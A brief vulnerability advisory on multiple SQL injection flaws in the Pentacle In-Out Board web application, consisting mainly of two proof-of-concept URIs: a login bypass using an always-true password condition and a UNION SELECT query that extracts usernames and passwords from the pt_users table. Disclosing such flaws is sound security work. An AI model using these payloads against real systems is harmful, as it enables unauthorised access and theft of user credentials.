Pentacle In-Out Board Multiple SQL Injection Vulnerabilities

Pentacle In-Out Board Multiple SQL Injection Vulnerabilities

These issues can be exploited through use of a web client.

The following proof of concept URI are available:

http://www.example.com/[ptdir]/login.asp?username=any&password=' or '1'='1

http://www.example.com/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes